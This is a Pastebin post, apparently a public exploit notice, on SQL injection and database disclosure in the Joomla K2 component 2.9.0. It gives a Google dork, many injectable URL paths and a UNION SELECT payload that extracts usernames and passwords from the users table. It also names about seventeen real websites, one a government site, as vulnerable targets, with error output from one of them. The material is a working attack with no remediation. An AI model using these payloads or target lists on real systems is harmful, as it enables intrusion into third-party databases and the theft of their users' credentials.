API tools faq
paste
KingSkrupellos

Joomla K2 Components 2.9.0 SQL Inj / DB Disclosure

KingSkrupellos
Feb 3rd, 2019
106
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.01 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla K2 Components 2.9.0 SQL Injection / Database Disclosure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 04/02/2019
  7. # Vendor Homepage : getk2.org
  8. # Software Download Link : getk2.org/downloads/?f=K2_v2.9.0.zip
  9. # Software Information Link : extensions.joomla.org/extension/k2/
  10. # Software Version : 2.9.0 and previous versions.
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_k2''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # Old Similar CVE [ Only Version is Different ] : CVE-2009-2395
  18. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  19. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  20. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  21.  
  22. ####################################################################
  23.  
  24. # Description about Software :
  25. ***************************
  26. The powerful award-winning content extension for Joomla with
  27.  
  28. more than 3 million downloads (and counting)!
  29.  
  30. K2 provides an out-of-the box integrated solution featuring rich content forms
  31.  
  32. for items (think of Joomla articles with additional fields for article images, videos,
  33.  
  34. image galleries and attachments), nested-level categories, tags, comments,
  35.  
  36. a system to extend the item base form with additional fields (similar to CCK
  37.  
  38. for those acquainted with Drupal), a powerful plugin API to extend item,
  39.  
  40. category and user forms, ACL, frontend editing, sub-templates & a lot more!
  41.  
  42. Using K2, you can transform your Joomla website to a news/magazine site
  43.  
  44. with author blogs, product catalogs, work portfolio, knowledge base,
  45.  
  46. download/document manager, directory listing, event listing & more,
  47.  
  48. all this bundled under one package!
  49.  
  50. ####################################################################
  51.  
  52. # Impact :
  53. ***********
  54. Joomla K2 2.9.0 component for Joomla and other previous versions is prone
  55.  
  56. to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied
  57.  
  58. data before using it in an SQL query.
  59.  
  60. Exploiting this issue could allow an attacker to compromise the application,
  61.  
  62. access or modify data, or exploit latent vulnerabilities in the underlying database.
  63.  
  64. A remote attacker can send a specially crafted request to the vulnerable application
  65.  
  66. and execute arbitrary SQL commands in application`s database.
  67.  
  68. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  69.  
  70. An attacker can exploit this issue using a browser.
  71.  
  72. * This Software prone to an information exposure/database disclosure vulnerability.
  73.  
  74. Successful exploits of this issue may allow an attacker to obtain sensitive
  75.  
  76. information by downloading the full contents of the application's database.
  77.  
  78. * Any remote user may download the database files and gain access
  79.  
  80. to sensitive information including unencrypted authentication credentials.
  81.  
  82. ####################################################################
  83.  
  84. # SQL Injection Exploit :
  85. **********************
  86.  
  87. /index.php?option=com_k2&view=itemlist&category=[SQL Injection]
  88.  
  89. /index.php/component/users/?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
  90.  
  91. /index.php?option=com_k2&view=itemlist&task=category&id=[ID-NUMBER]:video&Itemid=[SQL Injection]
  92.  
  93. /index.php?option=com_k2&view=itemlist&task=user&id=[SQL Injection]
  94.  
  95. /index.php?option=com_k2&view=item&layout=item&id=[SQLi]&Itemid=[SQL Injection]&lang=en
  96.  
  97. /index.php?option=com_k2store&view=checkout&task=getCountry&=[SQL Injection]
  98.  
  99. /index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
  100.  
  101. /index.php?option=com_k2&view=itemlist&task=user&id=[ID-NUMBER][TOPIC-NAME]&Itemid=[SQL Injection]
  102.  
  103. /index.php?option=com_k2&view=item&id=[ID-NUMBER]:[TOPIC-NAME]&tmpl=component&print=[SQL Injection]
  104.  
  105. /index.php?option=com_k2&view=item&layout=item&id=[ID-NUMBER]&Itemid=[SQL Injection]
  106.  
  107. /index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&Itemid=[SQL Injection]
  108.  
  109. /index.php?option=com_k2&view=itemlist&task=tag&tag=[TAG-NAME-HERE]&format=feed&type=atom&Itemid=[SQL Injection]
  110.  
  111. /index.php?option=com_k2&view=itemlist&task=date&year=[YEAR]&month=[MONTH]&day=[DAY]&Itemid=[ID-NUMBER]&limitstart=[SQL Injection]
  112.  
  113. # Example SQL Injection Payload :
  114. ******************************
  115. null'+and+1=2+union+select+1,concat(username,0x3a,password)KingSkrupellos,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
  116.  
  117. null'+and+1=2+union+select+1,concat(username,0x3a,password)KingSkrupellos,3,4,5,6,7,8,9,10,11,12,13,14+from+jos_users/*
  118.  
  119. ####################################################################
  120.  
  121. # Database Disclosure Exploit :
  122. ***************************
  123.  
  124. /administrator/components/com_k2/install.mysql.sql
  125.  
  126. /administrator/components/com_k2/uninstall.mysql.sql
  127.  
  128. ####################################################################
  129.  
  130. # Example Vulnerable Sites :
  131. *************************
  132. [+] personeriadebarranquilla.gov.co/index.php/component
  133. /users/?option=com_k2&view=itemlist&task=user&id=1%27
  134.  
  135. [+] projectflooring.it/site/index.php?option=com_k2&view=
  136. itemlist&task=tag&tag=BATTENTI&Itemid=435%27
  137.  
  138. [+] paolocalicchio.it/index.php?option=com_k2&view=
  139. itemlist&task=category&id=20:video&Itemid=175%27
  140.  
  141. [+] davidblair.co.uk/index.php?option=com_k2&view=
  142. itemlist&task=user&id=62770%27
  143.  
  144. [+] platinum-labs.com/index.php?option=com_k2&view=
  145. itemlist&task=user&id=325022%27
  146.  
  147. [+] arieltheatre.ro/index.php?option=com_k2&view=
  148. itemlist&task=tag&tag=
  149. Ariana+Serban&format=feed&type=atom&Itemid=197%27
  150.  
  151. [+] fototrogu.com/milos/index.php?option=com_k2&view=
  152. itemlist&task=user&id=64%3Amilos&Itemid=75%27
  153.  
  154. [+] toldosypersianasagustinmartin.com/inicio/index.php?option=
  155. com_k2&view=item&id=20:cofre-t7-siplan&tmpl=component&print=1%27
  156.  
  157. [+] irishpoolassociation.info/irishpoolsite/index.php?option=
  158. com_k2&view=item&layout=item&id=119&Itemid=234%27
  159.  
  160. [+] inhousedesignco.com/index.php?option=
  161. com_k2&view=item&id=64%27
  162.  
  163. [+] jeffreykentart.com/kentart/index.php?option=
  164. com_k2&view=itemlist&task=user&id=672%27
  165.  
  166. [+] designlabinternational.com/DesignLABInternational/index.php?option=
  167. com_k2&view=item&layout=item&id=36&Itemid=17%27
  168.  
  169. [+] code-ethiopia.org/index.php?option=
  170. com_k2&view=item&layout=item&id=27&Itemid=8%27
  171.  
  172. [+] nokhba.ly/en/index.php/component/users//?option=
  173. com_k2&view=itemlist&task=user&id=4633%27
  174.  
  175. [+] westrockcc.com/index.php?option=
  176. com_k2&view=item&id=12:wellness-centre-survey&Itemid=169%27
  177.  
  178. [+] onecallventilation.com/main-page/index.php/component
  179. /users//?option=com_k2&view=itemlist&task=user&id=3823%27
  180.  
  181. [+] forestalgarriga.com/index.php?option=
  182. com_k2&view=itemlist&task=user&id=1%27
  183.  
  184. [+] feiraviva.com/novo/administrator/components/com_k2/install.mysql.sql
  185.  
  186. ####################################################################
  187.  
  188. # Example SQL Database Error :
  189. ****************************
  190. Warning: Declaration of JParameter::loadSetupFile($path) should be
  191. compatible with JRegistry::loadSetupFile() in /home/personer
  192. /public_html/libraries/joomla/html/parameter.php on line 512
  193.  
  194. Warning: Declaration of JCacheControllerPage::store($wrkarounds =
  195. true) should be compatible with JCacheController::store
  196. ($data, $id, $group = NULL) in /home/personer/public_html
  197. /libraries/joomla/cache/controller/page.php on line 199
  198.  
  199. Warning: preg_replace(): The /e modifier is no longer supported,
  200. use preg_replace_callback instead in /home/personer/public_html
  201. /libraries/joomla/filter/input.php on line 652
  202.  
  203. Warning: Use of undefined constant K2_JVERSION -
  204. assumed 'K2_JVERSION' (this will throw an Error in a future
  205. version of PHP) in /home/personer/public_html/components/com_k2/k2.php on line 13
  206.  
  207. ####################################################################
  208.  
  209. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  210.  
  211. ####################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!